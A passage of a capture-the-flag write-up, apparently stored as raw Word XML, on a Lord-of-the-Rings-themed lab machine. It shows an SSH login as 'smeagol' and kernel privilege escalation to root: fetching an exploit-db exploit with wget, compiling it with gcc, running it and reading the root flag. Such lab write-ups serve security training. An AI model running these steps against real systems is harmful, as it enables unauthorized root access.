            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="20364447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930140"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDAC5F6" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve">After retrieving several users, we try logging in, and only </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D29BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>smeagol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve"> successfully connects over SSH:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E93565" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:t>ssh smeagol@192.168.1.35</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB26B62" w14:textId="77362BEE" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="099B4135" wp14:editId="1A06A090">
            <wp:extent cx="5943600" cy="3143885"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="602780019"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80019" name="Picture 25"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43885"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CE8D02" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:t>We’re in!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0449B0" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:pict w14:anchorId="242138BE">
          <v:rect id="_x0000_i1154" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="188BB51D" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D29BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AFDAA6" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:t>To escalate privileges, let’s check the kernel version and search for an exploit.</w:t>
      </w:r>
      <w:r w:rsidRPr="008D29BE">
        <w:br/>
        <w:t xml:space="preserve">We locate the exploit on </w:t>
      </w:r>
      <w:r w:rsidRPr="008D29BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exploit-db</w:t>
      </w:r>
      <w:r w:rsidRPr="008D29BE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F63E639" w14:textId="713EE616" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="298A8420" wp14:editId="0B4A7FC5">
            <wp:extent cx="5943600" cy="1283970"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="204853831" name="Picture 2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3831" name="Picture 24" descr="A screen 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283970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="008D29BE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41FB94D2" wp14:editId="7F0DCB91">
            <wp:extent cx="5943600" cy="2817495"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="2515676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66840354" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:t>Okay that’s it ,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718099A2" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:t>Next, we download the exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D92E02C" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve"> https://www.exploit-db.com/download/39166</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AEEFCC" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:t>We compile it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703229AB" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve"> 39166.c -o medo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7566AD" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:t>and we need to run an exploit like this :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F0E7DE" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:t>./medo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FC1480" w14:textId="31059DC8" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B8903EB" wp14:editId="441458AC">
            <wp:extent cx="5943600" cy="1682750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1564046888"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46888" name="Picture 22" descr="A screen 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82750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AB5F13" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>finally</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve"> we are </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>rooooooot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="536B16F2" w14:textId="63368042" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02684117" wp14:editId="21F8DCAC">
            <wp:extent cx="5572125" cy="514350"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="16148941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514350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5C20D9" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t xml:space="preserve"> last thing we need the root flag so we will go to root </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D29BE">
        <w:t> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6503FE" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:t>cd /root</w:t>
      </w:r>
      <w:r w:rsidRPr="008D29BE">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008D29BE">
        <w:br/>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2156F4FA" w14:textId="3273FC95" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7495C66D" wp14:editId="5B9A897C">
            <wp:extent cx="5943600" cy="873760"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="383853397" name="Picture 2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53397" name="Picture 20" descr="A black background with whit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73760"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2000DC29" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:t>cat Flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0AD35B" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:t>“There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.”</w:t>
      </w:r>
      <w:r w:rsidRPr="008D29BE">
        <w:br/>
        <w:t>– Gandalf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265B2852" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:t>By leveraging methodical reconnaissance, exploiting vulnerabilities, and escalating privileges, we successfully achieved root access and retrieved the ultimate flag. This challenge reinforced our skills in network discovery, SQL injection, and privilege escalation, proving that with persistence and teamwork, we can tackle any obstacles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12269899" w14:textId="77777777" w:rsidR="008D29BE" w:rsidRPr="008D29BE" w:rsidRDefault="008D29BE" w:rsidP="008D29BE">
      <w:r w:rsidRPr="008D29BE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>“One does not simply walk into Mordor”</w:t>
      </w:r>
      <w:r w:rsidRPr="008D29BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D29BE">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidRPr="008D29BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D29BE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>but today, we did.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F543900" w14:textId="77777777" w:rsidR="003938AD" w:rsidRDefault="003938AD"/>
    <w:sectPr w:rsidR="003938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9BE"/>
    <w:rsid w:val="003938AD"/>
    <w:rsid w:val="008D29BE"/>
    <w:rsid w:val="00AA5E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24A8D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9BF15F40-E71C-44E9-8AF6-192B287A2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29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29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29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29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29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29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29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29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29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9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29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29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29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29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29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29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29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29BE"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="008D29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29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29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29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29BE"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="008D29BE"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="008D29BE"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="008D29BE"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="008D29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29BE"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="008D29BE"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008D29BE"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008D29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6499021">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1353607628">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1953972725">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1369837662">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1736121269">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="381558575">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1759788761">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="203156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2233506">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1170487661">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1180972024">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1925413732">
                  <w:blockQuote w:val="1"/>
                  <w:marLeft w:val="720"/>
                  <w:marRight w:val="720"/>
                  <w:marTop w:val="100"/>
                  <w:marBottom w:val="100"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="1299340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29239924">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="687215613">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1546793343">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1759786187">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="2053380641">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2030984778">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1572081822">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1967079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3892529">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1322662307">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1095438212">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1529875958">
                  <w:blockQuote w:val="1"/>
                  <w:marLeft w:val="720"/>
                  <w:marRight w:val="720"/>
                  <w:marTop w:val="100"/>
                  <w:marBottom w:val="100"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="348063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medium.com/@a.essam0_o"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https://medium.com/@zoror861"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510</Words>
  <Characters>2910</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>24</Lines>
  <Paragraphs>6</Paragraphs>
